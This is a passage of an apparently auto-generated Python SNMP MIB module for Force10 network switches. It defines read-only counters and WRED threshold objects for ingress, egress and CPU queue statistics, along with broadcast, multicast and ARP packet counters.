') f10IngUnicastPacketCount = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 2, 1, 9), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10IngUnicastPacketCount.setStatus('current') if mibBuilder.loadTexts: f10IngUnicastPacketCount.setDescription('The cumulative number of packets passing through this queue. This object is available on Cyclone version 2.0 (C2T2) and Cyclone version 3.0 (X3) hardwares only. ') f10IngUnicastGreenMin = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 2, 1, 10), Unsigned32()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10IngUnicastGreenMin.setStatus('current') if mibBuilder.loadTexts: f10IngUnicastGreenMin.setDescription('The min threshold for Green packets. The min threshold identifies the queue size percentage at which the WRED dropping starts to be applied with a given configured probability. ') f10IngUnicastGreenMax = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 2, 1, 11), Unsigned32()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10IngUnicastGreenMax.setStatus('current') if mibBuilder.loadTexts: f10IngUnicastGreenMax.setDescription('The max threshold for Green packets. The max threshold identifies the queue size level at which tail drops occurs. ') f10IngUnicastGreenDrop = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 2, 1, 12), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10IngUnicastGreenDrop.setStatus('current') if mibBuilder.loadTexts: f10IngUnicastGreenDrop.setDescription('The number of Green packets being dropped in this queue. ') f10IngUnicastYellowMin = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 2, 1, 13), Unsigned32()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10IngUnicastYellowMin.setStatus('current') if mibBuilder.loadTexts: f10IngUnicastYellowMin.setDescription('The min threshold for Yellow packets. The min threshold identifies the queue size percentage at which the WRED dropping starts to be applied with a given configured probability. 
') f10IngUnicastYellowMax = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 2, 1, 14), Unsigned32()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10IngUnicastYellowMax.setStatus('current') if mibBuilder.loadTexts: f10IngUnicastYellowMax.setDescription('The max threshold for Yellow packets. The max threshold identifies the queue size level at which tail drops occurs. ') f10IngUnicastYellowDrop = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 2, 1, 15), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10IngUnicastYellowDrop.setStatus('current') if mibBuilder.loadTexts: f10IngUnicastYellowDrop.setDescription('The number of Yellow packets being dropped in this queue. ') f10IngUnicastRedDrop = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 2, 1, 16), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10IngUnicastRedDrop.setStatus('current') if mibBuilder.loadTexts: f10IngUnicastRedDrop.setDescription('The number of Red packets being dropped in this queue. ') f10IngQueueMulticastStatTable = MibTable((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 3), ) if mibBuilder.loadTexts: f10IngQueueMulticastStatTable.setStatus('current') if mibBuilder.loadTexts: f10IngQueueMulticastStatTable.setDescription('The Ingress Queue Multicast Statistics Table. This table provides Queue statistics for Ingress Multicast packets at Force10 linecards. ') f10IngQueueMulticastStatEntry = MibTableRow((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 3, 1), ).setIndexNames((0, "FORCE10-MONITORING-MIB", "f10IngMulticastSrcCard"), (0, "FORCE10-MONITORING-MIB", "f10IngMulticastSrcPortPipe"), (0, "FORCE10-MONITORING-MIB", "f10IngMulticastQueueId")) if mibBuilder.loadTexts: f10IngQueueMulticastStatEntry.setStatus('current') if mibBuilder.loadTexts: f10IngQueueMulticastStatEntry.setDescription('An entry in the Ingress Queue Multicast Statistics table. The Ingress Queue Multicast Statistics Table is indexed by the source linecard/portpipe and Queue ID. 
') f10IngMulticastSrcCard = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 3, 1, 1), F10SlotID()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10IngMulticastSrcCard.setStatus('current') if mibBuilder.loadTexts: f10IngMulticastSrcCard.setDescription('This is the source linecard number. This is the first index of this table entry. ') f10IngMulticastSrcPortPipe = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 3, 1, 2), F10PortPipeID()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10IngMulticastSrcPortPipe.setStatus('current') if mibBuilder.loadTexts: f10IngMulticastSrcPortPipe.setDescription('This is the Force10 Cyclone PortPipe number of the source linecard. This is the 2nd index of this table entry. ') f10IngMulticastQueueId = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 3, 1, 3), F10QueueID()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10IngMulticastQueueId.setStatus('current') if mibBuilder.loadTexts: f10IngMulticastQueueId.setDescription('This is the Queue ID of this entry. This is the 3rd index of this table entry. ') f10IngMulticastCycloneVersion = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 3, 1, 4), F10CycloneVersion()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10IngMulticastCycloneVersion.setStatus('current') if mibBuilder.loadTexts: f10IngMulticastCycloneVersion.setDescription('The linecard Cyclone hardware version. ') f10IngMulticastBytes = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 3, 1, 5), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10IngMulticastBytes.setStatus('current') if mibBuilder.loadTexts: f10IngMulticastBytes.setDescription('The number of bytes in the queue. This object is available on Cyclone version 1.5 (CjTj) hardware only. 
') f10IngMulticastBytesCount = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 3, 1, 6), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10IngMulticastBytesCount.setStatus('current') if mibBuilder.loadTexts: f10IngMulticastBytesCount.setDescription('The cumulative number of bytes data passing through this queue. This object is available on Cyclone version 2.0 (C2T2) and Cyclone version 3.0 (X3) hardwares only. ') f10IngMulticastPacketCount = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 3, 1, 7), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10IngMulticastPacketCount.setStatus('current') if mibBuilder.loadTexts: f10IngMulticastPacketCount.setDescription('The cumulative number of packets passing through this queue. This object is available on Cyclone version 2.0 (C2T2) and Cyclone version 3.0 (X3) hardwares only. ') f10IngMulticastGreenMin = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 3, 1, 8), Unsigned32()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10IngMulticastGreenMin.setStatus('current') if mibBuilder.loadTexts: f10IngMulticastGreenMin.setDescription('The min threshold for Green packets. The min threshold identifies the queue size percentage at which the WRED dropping starts to be applied with a given configured probability. ') f10IngMulticastGreenMax = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 3, 1, 9), Unsigned32()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10IngMulticastGreenMax.setStatus('current') if mibBuilder.loadTexts: f10IngMulticastGreenMax.setDescription('The max threshold for Green packets. The max threshold identifies the queue size level at which tail drops occurs. ') f10IngMulticastGreenDrop = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 3, 1, 10), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10IngMulticastGreenDrop.setStatus('current') if mibBuilder.loadTexts: f10IngMulticastGreenDrop.setDescription('The number of Green packets being dropped in this queue. 
') f10IngMulticastYellowMin = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 3, 1, 11), Unsigned32()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10IngMulticastYellowMin.setStatus('current') if mibBuilder.loadTexts: f10IngMulticastYellowMin.setDescription('The min threshold for Yellow packets. The min threshold identifies the queue size percentage at which the WRED dropping starts to be applied with a given configured probability. ') f10IngMulticastYellowMax = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 3, 1, 12), Unsigned32()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10IngMulticastYellowMax.setStatus('current') if mibBuilder.loadTexts: f10IngMulticastYellowMax.setDescription('The max threshold for Yellow packets. The max threshold identifies the queue size level at which tail drops occurs. ') f10IngMulticastYellowDrop = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 3, 1, 13), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10IngMulticastYellowDrop.setStatus('current') if mibBuilder.loadTexts: f10IngMulticastYellowDrop.setDescription('The number of Yellow packets being dropped in this queue. ') f10IngMulticastRedDrop = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 3, 1, 14), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10IngMulticastRedDrop.setStatus('current') if mibBuilder.loadTexts: f10IngMulticastRedDrop.setDescription('The number of Red packets being dropped in this queue. ') f10EgQueueUnicastStatTable = MibTable((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 4), ) if mibBuilder.loadTexts: f10EgQueueUnicastStatTable.setStatus('current') if mibBuilder.loadTexts: f10EgQueueUnicastStatTable.setDescription('The Egress Queue Unicast Statistics Table. This table provides Queue statistics for Egress Unicast packets at Force10 Interface. 
') f10EgQueueUnicastStatEntry = MibTableRow((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 4, 1), ).setIndexNames((0, "IF-MIB", "ifIndex"), (0, "FORCE10-MONITORING-MIB", "f10EgUnicastQueueId")) if mibBuilder.loadTexts: f10EgQueueUnicastStatEntry.setStatus('current') if mibBuilder.loadTexts: f10EgQueueUnicastStatEntry.setDescription('An entry in the Egress Queue Unicast Statistics table. The Egress Queue Unicast Statistics Table is indexed by the ifIndex and Queue ID. The IfIndex should be an valid Interface Index as defined in the RFC1213 MIB II Interface Table. ') f10EgUnicastQueueId = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 4, 1, 1), F10QueueID()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10EgUnicastQueueId.setStatus('current') if mibBuilder.loadTexts: f10EgUnicastQueueId.setDescription('This is the Queue ID of this entry. This is the 2nd index of this table entry. ') f10EgUnicastCycloneVersion = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 4, 1, 2), F10CycloneVersion()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10EgUnicastCycloneVersion.setStatus('current') if mibBuilder.loadTexts: f10EgUnicastCycloneVersion.setDescription('The linecard Cyclone hardware version. ') f10EgUnicastBytes = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 4, 1, 3), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10EgUnicastBytes.setStatus('current') if mibBuilder.loadTexts: f10EgUnicastBytes.setDescription('The number of bytes in the queue. This object is available on Cyclone version 1.5 (CjTj) hardware only. ') f10EgUnicastBytesCount = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 4, 1, 4), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10EgUnicastBytesCount.setStatus('current') if mibBuilder.loadTexts: f10EgUnicastBytesCount.setDescription('The cumulative number of bytes data passing through this queue. This object is available on Cyclone version 2.0 (C2T2) and Cyclone version 3.0 (X3) hardwares only. 
') f10EgUnicastPacketCount = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 4, 1, 5), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10EgUnicastPacketCount.setStatus('current') if mibBuilder.loadTexts: f10EgUnicastPacketCount.setDescription('The cumulative number of packets passing through this queue. This object is available on Cyclone version 2.0 (C2T2) and Cyclone version 3.0 (X3) hardwares only. ') f10EgUnicastGreenMin = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 4, 1, 6), Unsigned32()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10EgUnicastGreenMin.setStatus('current') if mibBuilder.loadTexts: f10EgUnicastGreenMin.setDescription('The min threshold for Green packets. The min threshold identifies the queue size percentage at which the WRED dropping starts to be applied with a given configured probability. ') f10EgUnicastGreenMax = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 4, 1, 7), Unsigned32()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10EgUnicastGreenMax.setStatus('current') if mibBuilder.loadTexts: f10EgUnicastGreenMax.setDescription('The max threshold for Green packets. The max threshold identifies the queue size level at which tail drops occurs. ') f10EgUnicastGreenDrop = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 4, 1, 8), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10EgUnicastGreenDrop.setStatus('current') if mibBuilder.loadTexts: f10EgUnicastGreenDrop.setDescription('The number of Green packets being dropped in this queue. ') f10EgUnicastYellowMin = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 4, 1, 9), Unsigned32()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10EgUnicastYellowMin.setStatus('current') if mibBuilder.loadTexts: f10EgUnicastYellowMin.setDescription('The min threshold for Yellow packets. The min threshold identifies the queue size percentage at which the WRED dropping starts to be applied with a given configured probability. 
') f10EgUnicastYellowMax = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 4, 1, 10), Unsigned32()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10EgUnicastYellowMax.setStatus('current') if mibBuilder.loadTexts: f10EgUnicastYellowMax.setDescription('The max threshold for Yellow packets. The max threshold identifies the queue size level at which tail drops occurs. ') f10EgUnicastYellowDrop = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 4, 1, 11), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10EgUnicastYellowDrop.setStatus('current') if mibBuilder.loadTexts: f10EgUnicastYellowDrop.setDescription('The number of Yellow packets being dropped in this queue. ') f10EgUnicastRedDrop = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 4, 1, 12), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10EgUnicastRedDrop.setStatus('current') if mibBuilder.loadTexts: f10EgUnicastRedDrop.setDescription('The number of Red packets being dropped in this queue. ') f10EgQueueMulticastStatTable = MibTable((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 5), ) if mibBuilder.loadTexts: f10EgQueueMulticastStatTable.setStatus('current') if mibBuilder.loadTexts: f10EgQueueMulticastStatTable.setDescription('The Egress Queue Multicast Statistics Table. This table provides Queue statistics for Egress Multicast packets at Force10 Interface. ') f10EgQueueMulticastStatEntry = MibTableRow((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 5, 1), ).setIndexNames((0, "IF-MIB", "ifIndex"), (0, "FORCE10-MONITORING-MIB", "f10EgMulticastQueueId")) if mibBuilder.loadTexts: f10EgQueueMulticastStatEntry.setStatus('current') if mibBuilder.loadTexts: f10EgQueueMulticastStatEntry.setDescription('An entry in the Egress Queue Multicast Statistics table. The Egress Queue Multicast Statistics Table is indexed by the ifIndex and Queue ID. The IfIndex should be an valid Interface Index as defined in the RFC1213 MIB II Interface Table. 
') f10EgMulticastQueueId = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 5, 1, 1), F10QueueID()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10EgMulticastQueueId.setStatus('current') if mibBuilder.loadTexts: f10EgMulticastQueueId.setDescription('This is the Queue ID of this entry. This is the 2nd index of this table entry. ') f10EgMulticastCycloneVersion = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 5, 1, 2), F10CycloneVersion()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10EgMulticastCycloneVersion.setStatus('current') if mibBuilder.loadTexts: f10EgMulticastCycloneVersion.setDescription('The linecard Cyclone hardware version. ') f10EgMulticastBytes = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 5, 1, 3), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10EgMulticastBytes.setStatus('current') if mibBuilder.loadTexts: f10EgMulticastBytes.setDescription('The number of bytes in the queue. This object is available on Cyclone version 1.5 (CjTj) hardware only. ') f10EgMulticastBytesCount = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 5, 1, 4), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10EgMulticastBytesCount.setStatus('current') if mibBuilder.loadTexts: f10EgMulticastBytesCount.setDescription('The cumulative number of bytes data passing through this queue. This object is available on Cyclone version 2.0 (C2T2) and Cyclone version 3.0 (X3) hardwares only. ') f10EgMulticastPacketCount = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 5, 1, 5), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10EgMulticastPacketCount.setStatus('current') if mibBuilder.loadTexts: f10EgMulticastPacketCount.setDescription('The cumulative number of packets passing through this queue. This object is available on Cyclone version 2.0 (C2T2) and Cyclone version 3.0 (X3) hardwares only. 
') f10EgMulticastGreenMin = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 5, 1, 6), Unsigned32()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10EgMulticastGreenMin.setStatus('current') if mibBuilder.loadTexts: f10EgMulticastGreenMin.setDescription('The min threshold for Green packets. The min threshold identifies the queue size percentage at which the WRED dropping starts to be applied with a given configured probability. ') f10EgMulticastGreenMax = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 5, 1, 7), Unsigned32()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10EgMulticastGreenMax.setStatus('current') if mibBuilder.loadTexts: f10EgMulticastGreenMax.setDescription('The max threshold for Green packets. The max threshold identifies the queue size level at which tail drops occurs. ') f10EgMulticastGreenDrop = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 5, 1, 8), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10EgMulticastGreenDrop.setStatus('current') if mibBuilder.loadTexts: f10EgMulticastGreenDrop.setDescription('The max threshold for Green packets. The max threshold identifies the queue size level at which tail drops occurs. ') f10EgMulticastYellowMin = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 5, 1, 9), Unsigned32()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10EgMulticastYellowMin.setStatus('current') if mibBuilder.loadTexts: f10EgMulticastYellowMin.setDescription('The min threshold for Yellow packets. The min threshold identifies the queue size percentage at which the WRED dropping starts to be applied with a given configured probability. ') f10EgMulticastYellowMax = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 5, 1, 10), Unsigned32()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10EgMulticastYellowMax.setStatus('current') if mibBuilder.loadTexts: f10EgMulticastYellowMax.setDescription('The max threshold for Yellow packets. 
The max threshold identifies the queue size level at which tail drops occurs. ') f10EgMulticastYellowDrop = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 5, 1, 11), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10EgMulticastYellowDrop.setStatus('current') if mibBuilder.loadTexts: f10EgMulticastYellowDrop.setDescription('The number of Yellow packets being dropped in this queue. ') f10EgMulticastRedDrop = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 5, 1, 12), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10EgMulticastRedDrop.setStatus('current') if mibBuilder.loadTexts: f10EgMulticastRedDrop.setDescription('The number of Red packets being dropped in this queue. ') f10CpuIngQueueUnicastStatTable = MibTable((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 6), ) if mibBuilder.loadTexts: f10CpuIngQueueUnicastStatTable.setStatus('current') if mibBuilder.loadTexts: f10CpuIngQueueUnicastStatTable.setDescription('The CPU Ingress Queue Unicast Statistics Table. This table provides Queue statistics for Ingress Unicast packets destined for CPU.') f10CpuIngQueueUnicastStatEntry = MibTableRow((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 6, 1), ).setIndexNames((0, "FORCE10-MONITORING-MIB", "f10CpuIngUnicastSrcCard"), (0, "FORCE10-MONITORING-MIB", "f10CpuIngUnicastSrcPortPipe"), (0, "FORCE10-MONITORING-MIB", "f10CpuIngUnicastDestCpu"), (0, "FORCE10-MONITORING-MIB", "f10CpuIngUnicastQueueId")) if mibBuilder.loadTexts: f10CpuIngQueueUnicastStatEntry.setStatus('current') if mibBuilder.loadTexts: f10CpuIngQueueUnicastStatEntry.setDescription('An entry in the CPU Ingress Queue Unicast Statistics Table. 
The CPU Ingress Queue Unicast Statistics Table is indexed by the source linecard/portpipe, cpu port and Queue ID.') f10CpuIngUnicastSrcCard = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 6, 1, 1), F10SlotID()) if mibBuilder.loadTexts: f10CpuIngUnicastSrcCard.setStatus('current') if mibBuilder.loadTexts: f10CpuIngUnicastSrcCard.setDescription('This is the source linecard number. This is the first index of this table entry.') f10CpuIngUnicastSrcPortPipe = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 6, 1, 2), F10PortPipeID()) if mibBuilder.loadTexts: f10CpuIngUnicastSrcPortPipe.setStatus('current') if mibBuilder.loadTexts: f10CpuIngUnicastSrcPortPipe.setDescription('This is the Force10 Cyclone PortPipe number of the source linecard.This is the 2nd index of this table entry.') f10CpuIngUnicastDestCpu = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 6, 1, 3), F10ProcessorModuleType()) if mibBuilder.loadTexts: f10CpuIngUnicastDestCpu.setStatus('current') if mibBuilder.loadTexts: f10CpuIngUnicastDestCpu.setDescription('This is the destination CPU port of this entry. This is the 3rd index of this table entry.') f10CpuIngUnicastQueueId = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 6, 1, 4), F10QueueID()) if mibBuilder.loadTexts: f10CpuIngUnicastQueueId.setStatus('current') if mibBuilder.loadTexts: f10CpuIngUnicastQueueId.setDescription('This is the Queue ID of this entry. 
This is the 4th index of this table entry.') f10CpuIngUnicastCycloneVersion = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 6, 1, 5), F10CycloneVersion()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10CpuIngUnicastCycloneVersion.setStatus('current') if mibBuilder.loadTexts: f10CpuIngUnicastCycloneVersion.setDescription('The linecard Cyclone hardware version.') f10CpuIngUnicastBytesCount = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 6, 1, 6), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10CpuIngUnicastBytesCount.setStatus('current') if mibBuilder.loadTexts: f10CpuIngUnicastBytesCount.setDescription('The cumulative number of bytes data passing through this queue. This object is available on Cyclone version 3.0 (X3) hardware only.') f10CpuIngUnicastPacketCount = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 6, 1, 7), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10CpuIngUnicastPacketCount.setStatus('current') if mibBuilder.loadTexts: f10CpuIngUnicastPacketCount.setDescription('The cumulative number of packets passing through this queue. This object is available on Cyclone version 3.0 (X3) hardware only.') f10CpuIngUnicastGreenMin = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 6, 1, 8), Unsigned32()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10CpuIngUnicastGreenMin.setStatus('current') if mibBuilder.loadTexts: f10CpuIngUnicastGreenMin.setDescription('The min threshold for Green packets. The min threshold identifies the queue size percentage at which the WRED dropping starts to be applied with a given configured probability.') f10CpuIngUnicastGreenMax = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 6, 1, 9), Unsigned32()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10CpuIngUnicastGreenMax.setStatus('current') if mibBuilder.loadTexts: f10CpuIngUnicastGreenMax.setDescription('The max threshold for Green packets. 
The max threshold identifies the queue size level at which tail drops occurs.') f10CpuIngUnicastGreenDrop = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 6, 1, 10), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10CpuIngUnicastGreenDrop.setStatus('current') if mibBuilder.loadTexts: f10CpuIngUnicastGreenDrop.setDescription('The number of Green packets being dropped in this queue.') f10CpuIngUnicastYellowMin = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 6, 1, 11), Unsigned32()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10CpuIngUnicastYellowMin.setStatus('current') if mibBuilder.loadTexts: f10CpuIngUnicastYellowMin.setDescription('The min threshold for Yellow packets. The min threshold identifies the queue size percentage at which the WRED dropping starts to be applied with a given configured probability.') f10CpuIngUnicastYellowMax = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 6, 1, 12), Unsigned32()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10CpuIngUnicastYellowMax.setStatus('current') if mibBuilder.loadTexts: f10CpuIngUnicastYellowMax.setDescription('The max threshold for Yellow packets. 
The max threshold identifies the queue size level at which tail drops occurs.') f10CpuIngUnicastYellowDrop = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 6, 1, 13), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10CpuIngUnicastYellowDrop.setStatus('current') if mibBuilder.loadTexts: f10CpuIngUnicastYellowDrop.setDescription('The number of Yellow packets being dropped in this queue.') f10CpuIngUnicastRedDrop = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 6, 1, 14), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10CpuIngUnicastRedDrop.setStatus('current') if mibBuilder.loadTexts: f10CpuIngUnicastRedDrop.setDescription('The number of Red packets being dropped in this queue.') f10BcastPktRecv = MibScalar((1, 3, 6, 1, 4, 1, 6027, 3, 3, 5, 1, 1), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10BcastPktRecv.setStatus('current') if mibBuilder.loadTexts: f10BcastPktRecv.setDescription('The total broadcast packet received. ') f10BcastPktSent = MibScalar((1, 3, 6, 1, 4, 1, 6027, 3, 3, 5, 1, 2), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10BcastPktSent.setStatus('current') if mibBuilder.loadTexts: f10BcastPktSent.setDescription('The total broadcast packet sent. ') f10McastPktRecv = MibScalar((1, 3, 6, 1, 4, 1, 6027, 3, 3, 5, 1, 3), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10McastPktRecv.setStatus('current') if mibBuilder.loadTexts: f10McastPktRecv.setDescription('The total multicast packet received. ') f10McastPktSent = MibScalar((1, 3, 6, 1, 4, 1, 6027, 3, 3, 5, 1, 4), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10McastPktSent.setStatus('current') if mibBuilder.loadTexts: f10McastPktSent.setDescription('The total multicast packet sent. 
') f10ArpReqRecv = MibScalar((1, 3, 6, 1, 4, 1, 6027, 3, 3, 5, 2, 1), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10ArpReqRecv.setStatus('current') if mibBuilder.loadTexts: f10ArpReqRecv.setDescription('The total ARP request received. ') f10ArpReqSent = MibScalar((1, 3, 6, 1, 4, 1, 6027, 3, 3, 5, 2, 2), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10ArpReqSent.setStatus('current') if mibBuilder.loadTexts: f10ArpReqSent.setDescription('The total ARP request sent. ') f10ArpReplyRecv = MibScalar((1, 3, 6, 1, 4, 1, 6027, 3, 3, 5, 2, 3), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10ArpReplyRecv.setStatus('current') if mibBuilder.loadTexts: f10ArpReplyRecv.setDescription('The total ARP reply received. ') f10ArpReplySent = MibScalar((1, 3, 6, 1, 4, 1, 6027, 3, 3, 5, 2, 4), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10ArpReplySent.setStatus('current') if mibBuilder.loadTexts: f10ArpReplySent.setDescription('The total ARP reply sent. ') f10ArpProxySent = MibScalar((1, 3, 6, 1, 4, 1, 6027, 3, 3, 5, 2, 5), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10ArpProxySent.setStatus('current') if mibBuilder.loadTexts: f10ArpProxySent.setDescription('The total ARP proxy sent. 
